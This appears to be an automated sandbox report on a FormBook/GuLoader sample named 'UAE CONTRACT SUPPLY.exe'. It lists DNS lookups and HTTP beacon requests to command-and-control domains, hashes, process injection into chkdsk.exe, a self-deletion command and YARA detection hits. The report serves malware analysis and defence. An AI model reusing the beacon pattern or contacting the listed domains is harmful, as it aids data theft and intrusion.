Feb 25, 2021 15:27:34.839993000 CET | 8.8.8.8 | 192.168.2.6 | 0xf69c | No error (0) | doc-08-78-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:27:34.839993000 CET | 8.8.8.8 | 192.168.2.6 | 0xf69c | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.184.65 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:27:38.256480932 CET | 8.8.8.8 | 192.168.2.6 | 0xe44e | No error (0) | cdn.onenote.net | cdn.onenote.net.edgekey.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:28:14.984534025 CET | 8.8.8.8 | 192.168.2.6 | 0xce23 | No error (0) | www.aserchofalltrades.com | www0.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:28:14.984534025 CET | 8.8.8.8 | 192.168.2.6 | 0xce23 | No error (0) | www0.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:28:14.984534025 CET | 8.8.8.8 | 192.168.2.6 | 0xce23 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:28:14.984534025 CET | 8.8.8.8 | 192.168.2.6 | 0xce23 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-dc11-60-102.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:28:14.984534025 CET | 8.8.8.8 | 192.168.2.6 | 0xce23 | No error (0) | td-balancer-dc11-60-102.wixdns.net | | 185.230.60.102 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:20.691571951 CET | 8.8.8.8 | 192.168.2.6 | 0x6a23 | No error (0) | www.parentseducationalco-op.com | parentseducationalco-op.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:28:20.691571951 CET | 8.8.8.8 | 192.168.2.6 | 0x6a23 | No error (0) | parentseducationalco-op.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:26.025517941 CET | 8.8.8.8 | 192.168.2.6 | 0x489f | Name error (3) | www.blackholidayco.com | none | none | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:31.136027098 CET | 8.8.8.8 | 192.168.2.6 | 0x777d | No error (0) | www.allsalesvinyl.net | allsalesvinyl.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:28:31.136027098 CET | 8.8.8.8 | 192.168.2.6 | 0x777d | No error (0) | allsalesvinyl.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:36.406847000 CET | 8.8.8.8 | 192.168.2.6 | 0x5687 | No error (0) | www.pardsoda.com | | 104.21.32.11 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:36.406847000 CET | 8.8.8.8 | 192.168.2.6 | 0x5687 | No error (0) | www.pardsoda.com | | 172.67.182.32 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:47.162172079 CET | 8.8.8.8 | 192.168.2.6 | 0x1dc8 | Server failure (2) | www.asesorgrupovivir.com | none | none | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:52.288326025 CET | 8.8.8.8 | 192.168.2.6 | 0x4206 | Server failure (2) | www.joybirder.com | none | none | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:57.367551088 CET | 8.8.8.8 | 192.168.2.6 | 0x584b | No error (0) | www.sixteen3handscottages.com | sixteen3handscottages.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:28:57.367551088 CET | 8.8.8.8 | 192.168.2.6 | 0x584b | No error (0) | sixteen3handscottages.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.aserchofalltrades.com
                                                        • www.parentseducationalco-op.com
                                                        • www.allsalesvinyl.net
                                                        • www.pardsoda.com
                                                        • www.sixteen3handscottages.com

                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49749 | 185.230.60.102 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:28:15.124083996 CET | 6318 | OUT | GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.aserchofalltrades.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Feb 25, 2021 15:28:15.270668030 CET | 6320 | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 25 Feb 2021 14:28:15 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-wix-request-id: 1614263295.2061857739024538739
                                                        vary: Accept-Encoding
                                                        Age: 0
                                                        X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgAmI6NXu6WfqLI/M7f8tcV,2d58ifebGbosy5xc+FRaljJhPW/QGfx+q8yY6tJt4liplW2KIFCnP2WuDwYfqFs95giHFpZ7ywPurTQjYl2cGQ==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,m0j2EEknGIVUW/liY8BLLsk16xozuw6nSXf6CEzK6Aca0sM5c8dDUFHeNaFq0qDu,JLaio/7uvfP647F5CQsGZbrBoTckX0poWZhq63wruFRGp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZZDXl7I7ILTyJojtezEQxYM0d1JjSaSBjnO+SH73qBkvWIHlCalF7YnfvOr2cMPpyw==
                                                        Server: Pepyaka/1.15.10
                                                        Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66
                                                        Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49751 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:28:20.735161066 CET | 6333 | OUT | GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.parentseducationalco-op.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Feb 25, 2021 15:28:20.874774933 CET | 6334 | IN | HTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:20 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "603155b8-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49752 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:28:31.179930925 CET | 6335 | OUT | GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.allsalesvinyl.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Feb 25, 2021 15:28:31.319639921 CET | 6335 | IN | HTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:31 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "603155b8-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49753 | 104.21.32.11 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:28:36.463717937 CET | 6337 | OUT | GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1
                                                        Host: www.pardsoda.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Feb 25, 2021 15:28:36.840812922 CET | 6338 | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 25 Feb 2021 14:28:36 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Set-Cookie: __cfduid=d35892cfcfe1bc318a38c848d3a378eab1614263316; expires=Sat, 27-Mar-21 14:28:36 GMT; path=/; domain=.pardsoda.com; HttpOnly; SameSite=Lax
                                                        Vary: Accept-Encoding
                                                        X-Turbo-Charged-By: LiteSpeed
                                                        CF-Cache-Status: DYNAMIC
                                                        cf-request-id: 087b3088120000fa7893ab1000000001
                                                        Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WkXIJ7%2FAsz6AvZSkytfDz1k50V5knPWTBe82bGry9sZdF6i4ecrchrXd44gYsxTh9Sfky4%2FvUbw16TDqu7N7FE%2B5SueMrWfq%2FJPsAWv7EJdk"}],"group":"cf-nel"}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 62721d201fcefa78-AMS
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 32 38 37 39 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: 2879<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49756 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:28:57.410073996 CET | 6366 | OUT | GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1
                                                        Host: www.sixteen3handscottages.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
Feb 25, 2021 15:28:57.549735069 CET | 6366 | IN | HTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:57 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "60363547-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 25, 2021 15:27:34.976358891 CET | 142.250.184.65 | 443 | 192.168.2.6 | 49731 | CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US | CN=GTS CA 1O1, O=Google Trust Services, C=US | Tue Jan 26 10:05:02 CET 2021 | Tue Apr 20 11:05:01 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
(intermediate certificate of the same chain) | | | | | CN=GTS CA 1O1, O=Google Trust Services, C=US | CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 | Thu Jun 15 02:00:42 CEST 2017 | Wed Dec 15 01:00:42 CET 2021 | |

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior


                                                        System Behavior

                                                        General

Start time: 15:26:42
Start date: 25/02/2021
Path: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
Imagebase: 0x400000
File size: 458752 bytes
MD5 hash: 9DA74A6D583C801677C0E2FDE51586BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Reputation: low

                                                        General

Start time: 15:26:54
Start date: 25/02/2021
Path: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
Imagebase: 0x400000
File size: 458752 bytes
MD5 hash: 9DA74A6D583C801677C0E2FDE51586BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

                                                        General

Start time: 15:27:37
Start date: 25/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:27:51
Start date: 25/02/2021
Path: C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit): false
Commandline: C:\Windows\SysWOW64\autoconv.exe
Imagebase: 0x12d0000
File size: 851968 bytes
MD5 hash: 4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 15:27:51
Start date: 25/02/2021
Path: C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\chkdsk.exe
Imagebase: 0x1340000
File size: 23040 bytes
MD5 hash: 2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 15:27:55
Start date: 25/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:27:55
Start date: 25/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
